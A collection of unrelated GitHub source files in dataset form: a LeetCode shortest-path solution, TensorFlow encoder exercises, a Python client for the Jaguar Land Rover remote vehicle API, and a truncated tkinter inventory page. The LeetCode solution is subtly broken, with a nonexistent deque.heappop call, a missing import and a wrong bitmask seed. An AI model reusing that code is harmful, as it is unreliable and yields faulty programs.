Frame)\n","repo_name":"vivianel/DarePy-SANS","sub_path":"codes/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":10616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"32070649049","text":"from typing import List\n\n\nclass Solution:\n \"\"\"\n You have an undirected, connected graph of n nodes labeled from 0 to n - 1. You are given an array graph where graph[i] is a list of all the nodes connected with node i by an edge.\n\n Return the length of the shortest path that visits every node. You may start and stop at any node, you may revisit nodes multiple times, and you may reuse edges.\n\n Example 1:\n\n Input: graph = [[1,2,3],[0],[0],[0]]\n Output: 4\n Explanation: One possible path is [1,0,2,0,3]\n Example 2:\n\n Input: graph = [[1],[0,2,4],[1,3,4],[2],[1,2]]\n Output: 4\n Explanation: One possible path is [0,1,4,2,3]\n \"\"\"\n def shortestPathLength1(self, graph: List[List[int]]) -> int:\n n = len(graph)\n if n == 1:\n return 0\n que = []\n visited = set()\n for node, _ in enumerate(graph):\n state = 1 << node\n que.append((0, node, state))\n visited.add((node, state))\n target = (1 << n) - 1\n\n while que:\n dis, node, state = deque.heappop(que)\n for nei in graph[node]:\n nei_state = 1 << nei | state\n if nei_state == target:\n return dis + 1\n if (nei, nei_state) in visited:\n continue\n deque.heappush(que, (dis + 1, nei, nei_state))\n visited.add((nei, nei_state))\n \n def shortestPathLength(self, graph: List[List[int]]) -> int:\n n = len(graph)\n final_mask = (1 << n) - 1\n\n que = deque([[i, 1 << i, 0] for i in range(n)])\n visited = set((i, i << i) for i in range(n))\n while que:\n node, mask, steps = que.popleft()\n if mask == final_mask:\n return steps\n for neighbor in graph[node]:\n new_mask = mask | (1 << neighbor)\n if (neighbor, new_mask) not in visited:\n visited.add((neighbor, new_mask))\n que.append([neighbor, new_mask, steps + 1])\n return -1\n\n","repo_name":"benbendaisy/CommunicationCodes","sub_path":"python_module/examples/847_Shortest_Path_Visiting_All_Nodes.py","file_name":"847_Shortest_Path_Visiting_All_Nodes.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21595466156","text":"import tensorflow as tf\nfrom model.module import transformer\n\n\n# prac 1\nclass CNNBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(CNNBasedEncoder, self).__init__()\n self.cnn_layers = []\n for i in range(args.encoder_n_layer):\n self.cnn_layers.append(\n tf.keras.layers.Conv1D(args.dim_embedding, args.cnn_kernel_size, padding='same', activation='relu'\n , name='cnn_layer_{}'.format(str(i)))\n )\n\n def call(self, inputs):\n out = inputs\n\n for cnn_layer in self.cnn_layers:\n out = cnn_layer(out)\n\n return out\n\n\n# prac 1\nclass LSTMBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(LSTMBasedEncoder, self).__init__()\n self.lstm_layers = []\n for i in range(args.encoder_n_layer):\n self.lstm_layers.append(\n tf.keras.layers.LSTM(args.dim_embedding, return_sequences=True, name='lstm_layer_{}'.format(str(i)))\n )\n\n def call(self, inputs):\n out = inputs\n\n for lstm_layer in self.lstm_layers:\n out = lstm_layer(out)\n\n return out\n\n\n# prac_1\n# Bidirectional : https://www.tensorflow.org/api_docs/python/tf/keras/layers/Bidirectional\nclass BiLSTMBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(BiLSTMBasedEncoder, self).__init__()\n self.lstm_layers = []\n for i in range(args.encoder_n_layer):\n # 빈칸 작성\n print('빈칸 작성')\n\n def call(self, inputs):\n out = inputs\n\n for lstm_layer in self.lstm_layers:\n out = lstm_layer(out)\n\n return out\n\n\nclass TransformerBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(TransformerBasedEncoder, self).__init__()\n self.transformer_layers = []\n for i in range(args.encoder_n_layer):\n self.transformer_layers.append(\n transformer.TransformerEncoderLayer(embed_dim=args.dim_embedding,\n num_heads=args.encoder_n_head,\n ff_dim=args.dim_embedding)\n )\n\n def call(self, inputs):\n x = inputs\n x_q, x_k, x_v = x, x, x\n\n for transformer_layer in self.transformer_layers:\n x_q = transformer_layer(x_q, x_k, x_v)\n x_k = x_q\n x_v = x_q\n\n return x_q\n","repo_name":"jhlee17139/TFNLP_prac","sub_path":"model/module/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"16392554170","text":"\"\"\" Simple Python class to access the JLR Remote Car API\nhttps://github.com/ardevd/jlrpy\n\"\"\"\n\nfrom urllib.request import Request, build_opener\n\nimport json\nimport datetime\nimport calendar\nimport uuid\nimport sys\nimport logging\n\nlogger = logging.getLogger('jply')\nlogger.setLevel(logging.INFO)\n\nch = logging.StreamHandler(sys.stdout)\nch.setFormatter(logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\"))\nlogger.addHandler(ch)\nlogger.propagate = False\n\nIFAS_BASE_URL = \"https://ifas.prod-row.jlrmotor.com/ifas/jlr\"\nIFOP_BASE_ULR = \"https://ifop.prod-row.jlrmotor.com/ifop/jlr\"\nIF9_BASE_URL = \"https://if9.prod-row.jlrmotor.com/if9/jlr\"\n\n\nclass Connection(object):\n \"\"\"Connection to the JLR Remote Car API\"\"\"\n\n def __init__(self,\n email='',\n password='',\n device_id='',\n refresh_token=''):\n \"\"\"Init the connection object\n\n The email address and password associated with your Jaguar InControl account is required.\n A device Id can optionally be specified. If not one will be generated at runtime.\n A refresh token can be supplied for authentication instead of a password\n \"\"\"\n self.email = email\n\n if device_id:\n self.device_id = device_id\n else:\n self.device_id = str(uuid.uuid4())\n\n if refresh_token:\n self.oauth = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token}\n else:\n self.oauth = {\n \"grant_type\": \"password\",\n \"username\": email,\n \"password\": password}\n\n self.expiration = 0 # force credential refresh\n\n self.connect()\n\n self.vehicles = []\n try:\n for v in self.get_vehicles(self.head)['vehicles']:\n self.vehicles.append(Vehicle(v, self))\n except TypeError:\n logger.error(\"No vehicles associated with this account\")\n\n def get(self, command, url, headers):\n \"\"\"GET data from API\"\"\"\n return self.post(command, url, headers, None)\n\n def post(self, command, url, headers, data=None):\n \"\"\"POST data to API\"\"\"\n now = calendar.timegm(datetime.datetime.now().timetuple())\n logger.debug(url)\n if now > self.expiration:\n # Auth expired, reconnect\n self.connect()\n return self.__open(\"%s/%s\" % (url, command), headers=headers, data=data)\n\n def connect(self):\n logger.info(\"Connecting...\")\n auth = self.__authenticate(data=self.oauth)\n self.__register_auth(auth)\n self.__set_header(auth['access_token'])\n logger.info(\"[+] authenticated\")\n self.__register_device_and_log_in()\n\n def __register_device_and_log_in(self):\n self.__register_device(self.head)\n logger.info(\"1/2 device id registered\")\n self.__login_user(self.head)\n logger.info(\"2/2 user logged in, user id retrieved\")\n\n def __open(self, url, headers=None, data=None):\n req = Request(url, headers=headers)\n if data:\n req.data = bytes(json.dumps(data), encoding=\"utf8\")\n\n opener = build_opener()\n resp = opener.open(req)\n charset = resp.info().get('charset', 'utf-8')\n resp_data = resp.read().decode(charset)\n if resp_data:\n return json.loads(resp_data)\n else:\n return None\n\n def __register_auth(self, auth):\n self.access_token = auth['access_token']\n now = calendar.timegm(datetime.datetime.now().timetuple())\n self.expiration = now + int(auth['expires_in'])\n self.auth_token = auth['authorization_token']\n self.refresh_token = auth['refresh_token']\n\n def __set_header(self, access_token):\n \"\"\"Set HTTP header fields\"\"\"\n self.head = {\n \"Authorization\": \"Bearer %s\" % access_token,\n \"X-Device-Id\": self.device_id,\n \"Content-Type\": 
\"application/json\"}\n\n def __authenticate(self, data=None):\n \"\"\"Raw urlopen command to the auth url\"\"\"\n url = \"%s/tokens\" % IFAS_BASE_URL\n auth_headers = {\n \"Authorization\": \"Basic YXM6YXNwYXNz\",\n \"Content-Type\": \"application/json\",\n \"X-Device-Id\": self.device_id}\n\n return self.__open(url, auth_headers, data)\n\n def __register_device(self, headers=None):\n \"\"\"Register the device Id\"\"\"\n url = \"%s/users/%s/clients\" % (IFOP_BASE_ULR, self.email)\n data = {\n \"access_token\": self.access_token,\n \"authorization_token\": self.auth_token,\n \"expires_in\": \"86400\",\n \"deviceID\": self.device_id\n }\n\n return self.__open(url, headers, data)\n\n def __login_user(self, headers=None):\n \"\"\"Login the user\"\"\"\n url = \"%s/users?loginName=%s\" % (IF9_BASE_URL, self.email)\n user_login_header = headers.copy()\n user_login_header[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.User-v3+json\"\n\n user_data = self.__open(url, user_login_header)\n self.user_id = user_data['userId']\n return user_data\n\n def refresh_tokens(self):\n \"\"\"Refresh tokens.\"\"\"\n self.oauth = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": self.refresh_token}\n\n auth = self.__authenticate(self.oauth)\n self.__register_auth(auth)\n self.__set_header(auth['access_token'])\n logger.info(\"[+] Tokens refreshed\")\n self.__register_device_and_log_in()\n\n def get_vehicles(self, headers):\n \"\"\"Get vehicles for user\"\"\"\n url = \"%s/users/%s/vehicles?primaryOnly=true\" % (IF9_BASE_URL, self.user_id)\n return self.__open(url, headers)\n\n def get_user_info(self):\n \"\"\"Get user information\"\"\"\n return self.get(self.user_id, \"%s/users\" % IF9_BASE_URL, self.head)\n\n def update_user_info(self, user_info_data):\n \"\"\"Update user information\"\"\"\n headers = self.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.User-v3+json; charset=utf-8\"\n return self.post(self.user_id, \"%s/users\" % IF9_BASE_URL, headers, user_info_data)\n\n def reverse_geocode(self, lat, lon):\n \"\"\"Get geocode information\"\"\"\n return self.get(\"en\",\n \"%s/geocode/reverse/{0:f}/{1:f}\".format(lat, lon) % IF9_BASE_URL,\n self.head)\n\n\nclass Vehicle(dict):\n \"\"\"Vehicle class.\n\n You can request data or send commands to vehicle. 
Consult the JLR API documentation for details\n    \"\"\"\n\n    def __init__(self, data, connection):\n        \"\"\"Initialize the vehicle class.\"\"\"\n\n        super().__init__(data)\n        self.connection = connection\n        self.vin = data['vin']\n\n    def get_attributes(self):\n        \"\"\"Get vehicle attributes\"\"\"\n        headers = self.connection.head.copy()\n        headers[\"Accept\"] = \"application/vnd.ngtp.org.VehicleAttributes-v3+json\"\n        result = self.get('attributes', headers)\n        return result\n\n    def get_status(self, key=None):\n        \"\"\"Get vehicle status\"\"\"\n        headers = self.connection.head.copy()\n        headers[\"Accept\"] = \"application/vnd.ngtp.org.if9.healthstatus-v2+json\"\n        result = self.get('status', headers)\n\n        if key:\n            return {d['key']: d['value'] for d in result['vehicleStatus']}[key]\n\n        return result\n\n    def get_health_status(self):\n        \"\"\"Get vehicle health status\"\"\"\n        headers = self.connection.head.copy()\n        headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n        headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n\n        vhs_data = self._authenticate_vhs()\n\n        return self.post('healthstatus', headers, vhs_data)\n\n    def get_departure_timers(self):\n        \"\"\"Get vehicle departure timers\"\"\"\n        headers = self.connection.head.copy()\n        headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.DepartureTimerSettings-v1+json\"\n        return self.get(\"departuretimers\", headers)\n\n    def get_wakeup_time(self):\n        \"\"\"Get configured wakeup time for vehicle\"\"\"\n        headers = self.connection.head.copy()\n        headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.VehicleWakeupTime-v2+json\"\n        return self.get(\"wakeuptime\", headers)\n\n    def get_subscription_packages(self):\n        \"\"\"Get vehicle subscription packages\"\"\"\n        result = self.get('subscriptionpackages', self.connection.head)\n        return result\n\n    def get_trips(self, count=1000):\n        \"\"\"Get the most recent trips (default 1000) associated with vehicle\"\"\"\n        headers = self.connection.head.copy()\n        headers[\"Accept\"] = \"application/vnd.ngtp.org.triplist-v2+json\"\n        return self.get('trips?count=%d' % count, headers)\n\n    def get_trip(self, trip_id):\n        \"\"\"Get info on a specific trip\"\"\"\n        return self.get('trips/%s/route?pageSize=1000&page=0' % trip_id, self.connection.head)\n\n    def get_position(self):\n        \"\"\"Get current vehicle position\"\"\"\n        return self.get('position', self.connection.head)\n\n    def get_service_status(self, service_id):\n        \"\"\"Get service status\"\"\"\n        headers = self.connection.head.copy()\n        headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n        return self.get('services/%s' % service_id, headers)\n\n    def get_services(self):\n        \"\"\"Get active services\"\"\"\n        headers = self.connection.head.copy()\n        return self.get(\"services\", headers)\n\n    def get_rcc_target_value(self):\n        \"\"\"Get Remote Climate Target Value\"\"\"\n        headers = self.connection.head.copy()\n        return self.get('settings/ClimateControlRccTargetTemp', headers)\n\n    def set_attributes(self, nickname, registration_number):\n        \"\"\"Set vehicle nickname and registration number\"\"\"\n        attributes_data = {\"nickname\": nickname,\n                           \"registrationNumber\": registration_number}\n        return self.post(\"attributes\", self.connection.head, attributes_data)\n\n    def lock(self, pin):\n        \"\"\"Lock vehicle. 
Requires personal PIN for authentication\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n rdl_data = self.authenticate_rdl(pin)\n\n return self.post(\"lock\", headers, rdl_data)\n\n def unlock(self, pin):\n \"\"\"Unlock vehicle. Requires personal PIN for authentication\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n rdu_data = self.authenticate_rdu(pin)\n\n return self.post(\"unlock\", headers, rdu_data)\n\n def reset_alarm(self, pin):\n \"\"\"Reset vehicle alarm\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n aloff_data = self.authenticate_aloff(pin)\n\n return self.post(\"unlock\", headers, aloff_data)\n\n def honk_blink(self):\n \"\"\"Sound the horn and blink lights\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n\n hblf_data = self.authenticate_hblf()\n return self.post(\"honkBlink\", headers, hblf_data)\n\n def remote_engine_start(self, pin, target_value):\n \"\"\"Start Remote Engine preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n self.set_rcc_target_value(pin, target_value)\n reon_data = self.authenticate_reon(pin)\n\n return self.post(\"engineOn\", headers, reon_data)\n\n def remote_engine_stop(self, pin):\n \"\"\"Stop Remote Engine preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n reoff_data = self.authenticate_reoff(pin)\n\n return self.post(\"engineOff\", headers, reoff_data)\n\n def set_rcc_target_value(self, pin, target_value):\n \"\"\"Set Remote Climate Target Value (value between 31-57, 31 is LO 57 is HOT)\"\"\"\n headers = self.connection.head.copy()\n self.enable_provisioning_mode(pin)\n service_parameters = {\"key\": \"ClimateControlRccTargetTemp\",\n \"value\": \"%s\" % str(target_value),\n \"applied\": 1}\n self.post(\"settings\", headers, service_parameters)\n\n def preconditioning_start(self, target_temp):\n \"\"\"Start pre-conditioning for specified temperature (celsius)\"\"\"\n service_parameters = [{\"key\": \"PRECONDITIONING\",\n \"value\": \"START\"},\n {\"key\": \"TARGET_TEMPERATURE_CELSIUS\",\n \"value\": \"%s\" % target_temp}]\n\n return self._preconditioning_control(service_parameters)\n\n def preconditioning_stop(self):\n \"\"\"Stop climate preconditioning\"\"\"\n service_parameters = [{\"key\": \"PRECONDITIONING\",\n \"value\": \"STOP\"}]\n return self._preconditioning_control(service_parameters)\n\n def climate_prioritize(self, priority):\n \"\"\"Optimize climate controls for comfort or range\"\"\"\n service_parameters = [{\"key\": \"PRIORITY_SETTING\",\n \"value\": \"%s\" % priority}]\n return self._preconditioning_control(service_parameters)\n\n def _preconditioning_control(self, service_parameters):\n \"\"\"Control the climate preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] 
= \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v5+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.PhevService-v1+json; charset=utf-8\"\n\n ecc_data = self.authenticate_ecc()\n ecc_data['serviceParameters'] = service_parameters\n\n return self.post(\"preconditioning\", headers, ecc_data)\n\n def charging_stop(self):\n \"\"\"Stop charging\"\"\"\n service_parameters = [{\"key\": \"CHARGE_NOW_SETTING\",\n \"value\": \"FORCE_OFF\"}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def charging_start(self):\n \"\"\"Start charging\"\"\"\n service_parameters = [{\"key\": \"CHARGE_NOW_SETTING\",\n \"value\": \"FORCE_ON\"}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def set_max_soc(self, max_charge_level):\n \"\"\"Set max state of charge in percentage\"\"\"\n service_parameters = [{\"key\": \"SET_PERMANENT_MAX_SOC\",\n \"value\": max_charge_level}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def set_one_off_max_soc(self, max_charge_level):\n \"\"\"Set one off max state of charge in percentage\"\"\"\n service_parameters = [{\"key\": \"SET_ONE_OFF_MAX_SOC\",\n \"value\": max_charge_level}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def add_departure_timer(self, index, year, month, day, hour, minute):\n \"\"\"Add a single departure timer with the specified index\"\"\"\n departure_timer_setting = {\"timers\": [\n {\"departureTime\": {\"hour\": hour, \"minute\": minute},\n \"timerIndex\": index, \"timerTarget\":\n {\"singleDay\": {\"day\": day, \"month\": month, \"year\": year}},\n \"timerType\": {\"key\": \"BOTHCHARGEANDPRECONDITION\", \"value\": True}}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def add_repeated_departure_timer(self, index, schedule, hour, minute):\n \"\"\"Add repeated departure timer.\"\"\"\n departure_timer_setting = {\"timers\": [\n {\"departureTime\": {\"hour\": hour, \"minute\": minute},\n \"timerIndex\": index, \"timerTarget\":\n {\"repeatSchedule\": schedule},\n \"timerType\": {\"key\": \"BOTHCHARGEANDPRECONDITION\", \"value\": True}}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def delete_departure_timer(self, index):\n \"\"\"Delete a single departure timer associated with the specified index\"\"\"\n departure_timer_setting = {\"timers\": [{\"timerIndex\": index}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def add_charging_period(self, index, schedule, hour_from, minute_from, hour_to, minute_to):\n \"\"\"Add charging period\"\"\"\n tariff_settings = {\"tariffs\": [\n {\"tariffIndex\": index, \"tariffDefinition\": {\"enabled\": True,\n \"repeatSchedule\": schedule,\n \"tariffZone\": [\n {\"zoneName\": \"TARIFF_ZONE_A\",\n \"bandType\": \"PEAK\",\n \"endTime\": {\n \"hour\": hour_from,\n \"minute\": minute_from}},\n {\"zoneName\": \"TARIFF_ZONE_B\",\n \"bandType\": \"OFFPEAK\",\n \"endTime\": {\"hour\": hour_to,\n \"minute\": minute_to}},\n {\"zoneName\": \"TARIFF_ZONE_C\",\n \"bandType\": \"PEAK\",\n \"endTime\": {\"hour\": 0,\n \"minute\": 0}}]}}]}\n\n return self._charging_profile_control(\"tariffSettings\", tariff_settings)\n\n def _charging_profile_control(self, service_parameter_key, service_parameters):\n \"\"\"Charging profile API\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = 
\"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v5+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.PhevService-v1+json; charset=utf-8\"\n\n cp_data = self.authenticate_cp()\n cp_data[service_parameter_key] = service_parameters\n\n return self.post(\"chargeProfile\", headers, cp_data)\n\n def set_wakeup_time(self, wakeup_time):\n \"\"\"Set the wakeup time for the specified time (epoch milliseconds)\"\"\"\n swu_data = self.authenticate_swu()\n swu_data[\"serviceCommand\"] = \"START\"\n swu_data[\"startTime\"] = wakeup_time\n return self._swu(swu_data)\n\n def delete_wakeup_time(self):\n \"\"\"Stop the wakeup time\"\"\"\n swu_data = self.authenticate_swu()\n swu_data[\"serviceCommand\"] = \"END\"\n return self._swu(swu_data)\n\n def _swu(self, swu_data):\n \"\"\"Set the wakeup time for the specified time (epoch milliseconds)\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v3+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n return self.post(\"swu\", headers, swu_data)\n\n def enable_provisioning_mode(self, pin):\n \"\"\"Enable provisioning mode \"\"\"\n self._prov_command(pin, None, \"provisioning\")\n\n def enable_service_mode(self, pin, expiration_time):\n \"\"\"Enable service mode. Will disable at the specified time (epoch millis)\"\"\"\n return self._prov_command(pin, expiration_time, \"protectionStrategy_serviceMode\")\n\n def enable_transport_mode(self, pin, expiration_time):\n \"\"\"Enable transport mode. Will be disabled at the specified time (epoch millis)\"\"\"\n return self._prov_command(pin, expiration_time, \"protectionStrategy_transportMode\")\n\n def enable_privacy_mode(self, pin):\n \"\"\"Enable privacy mode. Will disable journey logging\"\"\"\n return self._prov_command(pin, None, \"privacySwitch_on\")\n\n def disable_privacy_mode(self, pin):\n \"\"\"Disable privacy mode. Will enable journey logging\"\"\"\n return self._prov_command(pin, None, \"privacySwitch_off\")\n\n def _prov_command(self, pin, expiration_time, mode):\n \"\"\"Send prov endpoint commands. 
Used for service/transport/privacy mode\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json\"\n prov_data = self.authenticate_prov(pin)\n\n prov_data[\"serviceCommand\"] = mode\n prov_data[\"startTime\"] = None\n prov_data[\"endTime\"] = expiration_time\n\n return self.post(\"prov\", headers, prov_data)\n\n def _authenticate_vhs(self):\n \"\"\"Authenticate to vhs and get token\"\"\"\n return self._authenticate_empty_pin_protected_service(\"VHS\")\n\n def _authenticate_empty_pin_protected_service(self, service_name):\n data = {\n \"serviceName\": service_name,\n \"pin\": \"\"}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def authenticate_hblf(self):\n \"\"\"Authenticate to hblf\"\"\"\n return self._authenticate_vin_protected_service(\"HBLF\")\n\n def authenticate_ecc(self):\n \"\"\"Authenticate to ecc\"\"\"\n return self._authenticate_vin_protected_service(\"ECC\")\n\n def authenticate_cp(self):\n \"\"\"Authenticate to cp\"\"\"\n return self._authenticate_vin_protected_service(\"CP\")\n\n def authenticate_swu(self):\n \"\"\"Authenticate to swu\"\"\"\n return self._authenticate_empty_pin_protected_service(\"SWU\")\n\n def _authenticate_vin_protected_service(self, service_name):\n \"\"\"Authenticate to specified service and return associated token\"\"\"\n data = {\n \"serviceName\": \"%s\" % service_name,\n \"pin\": \"%s\" % self.vin[-4:]}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def authenticate_rdl(self, pin):\n \"\"\"Authenticate to rdl\"\"\"\n return self._authenticate_pin_protected_service(pin, \"RDL\")\n\n def authenticate_rdu(self, pin):\n \"\"\"Authenticate to rdu\"\"\"\n return self._authenticate_pin_protected_service(pin, \"RDU\")\n\n def authenticate_aloff(self, pin):\n \"\"\"Authenticate to aloff\"\"\"\n return self._authenticate_pin_protected_service(pin, \"ALOFF\")\n\n def authenticate_reon(self, pin):\n \"\"\"Authenticate to reon\"\"\"\n return self._authenticate_pin_protected_service(pin, \"REON\")\n\n def authenticate_reoff(self, pin):\n \"\"\"Authenticate to reoff\"\"\"\n return self._authenticate_pin_protected_service(pin, \"REOFF\")\n\n def authenticate_prov(self, pin):\n \"\"\"Authenticate to PROV service\"\"\"\n return self._authenticate_pin_protected_service(pin, \"PROV\")\n\n def _authenticate_pin_protected_service(self, pin, service_name):\n \"\"\"Authenticate to specified service with the provided PIN\"\"\"\n data = {\n \"serviceName\": \"%s\" % service_name,\n \"pin\": \"%s\" % pin}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def post(self, command, headers, data):\n \"\"\"Utility command to post data to VHS\"\"\"\n return self.connection.post(command, '%s/vehicles/%s' % (IF9_BASE_URL, self.vin),\n headers, data)\n\n def get(self, command, headers):\n \"\"\"Utility command to get vehicle data from API\"\"\"\n return self.connection.get(command, '%s/vehicles/%s' % 
(IF9_BASE_URL, self.vin), headers)\n","repo_name":"smar000/jlr2mqtt","sub_path":"jlrpy.py","file_name":"jlrpy.py","file_ext":"py","file_size_in_byte":24760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
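# Hedged usage sketch for the jlrpy record above (kept as comments because the
# Connection class it relies on is defined earlier in that file and not shown
# here; the response shape and the status key below are illustrative only):
#
#   con = Connection(email='user@example.com', password='...')
#   data = con.get_vehicles(con.head)['vehicles'][0]   # assumed response shape
#   vehicle = Vehicle(data, con)
#   print(vehicle.get_status('DOOR_IS_ALL_DOORS_LOCKED'))  # illustrative key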
+{"seq_id":"34713530847","text":"from itertools import count\nfrom os import X_OK\nfrom tkinter import *\nfrom tkinter import ttk\nfrom datetime import *\nfrom time import strftime\nfrom PIL import ImageTk, Image\nfrom tkcalendar import DateEntry\nimport sqlite3\n# from functions import *\nimport signin\nimport dashboard\nimport products\nimport sales\nimport customers\nimport addproduct\nimport addcustomer\nimport addsales\n\nclass Products:\n def __init__(self, window):\n self.window = window\n width = 800\n height = 500\n sw = self.window.winfo_screenwidth()\n sh = self.window.winfo_screenheight()\n x = (sw/5)\n y = (sh/11)\n self.window.geometry(f'{width}x{height}+{int(x)}+{int(y)}')\n self.window.title('TCP Management | Products page')\n self.window.configure(bg='#f7f3f2')\n self.window.wm_iconbitmap('FMCG.ico')\n self.window.resizable(0, 0)\n\n # Database\n def SalesData():\n db = sqlite3.connect('GLBL.db')\n cursor = db.cursor()\n cursor.execute('select * from products')\n records = cursor.fetchall()\n \n global count\n count = 0\n for record in records:\n SalesView.insert(parent='', index='end', iid=count, values=(record[0], \n record[1], record[2], record[3])) \n count = count + 1\n\n db.commit()\n db.close()\n\n\n\n # First Frame & Menu\n MenuFrame = Frame(window)\n MenuFrame.pack(fill=X, expand='no')\n\n Menu = Button(MenuFrame, text = 'Overview', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.dashb)\n Menu.grid(row=0, column=0, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=1, pady=10)\n\n Menu2 = Button(MenuFrame, text = 'Products', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.prod)\n Menu2.grid(row=0, column=2, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=3, pady=10)\n\n Menu3 = Button(MenuFrame, text = 'Sales', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.saless)\n Menu3.grid(row=0, column=4, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=5, pady=10)\n\n Menu4 = Button(MenuFrame, text = 'Customers', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.cus)\n Menu4.grid(row=0, column=6, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=7, pady=10)\n\n Menu5 = Button(MenuFrame, text = 'Vendors', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu5.grid(row=0, column=8, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=9, pady=10)\n\n Menu6 = Button(MenuFrame, text = 'Inventory', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu6.grid(row=0, column=10, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=11, pady=10)\n\n Menu7 = Button(MenuFrame, text = 'Expenses', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu7.grid(row=0, column=12, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=13, pady=10)\n\n Menu9 = Button(MenuFrame, text = 'Log Out', bd=0, 
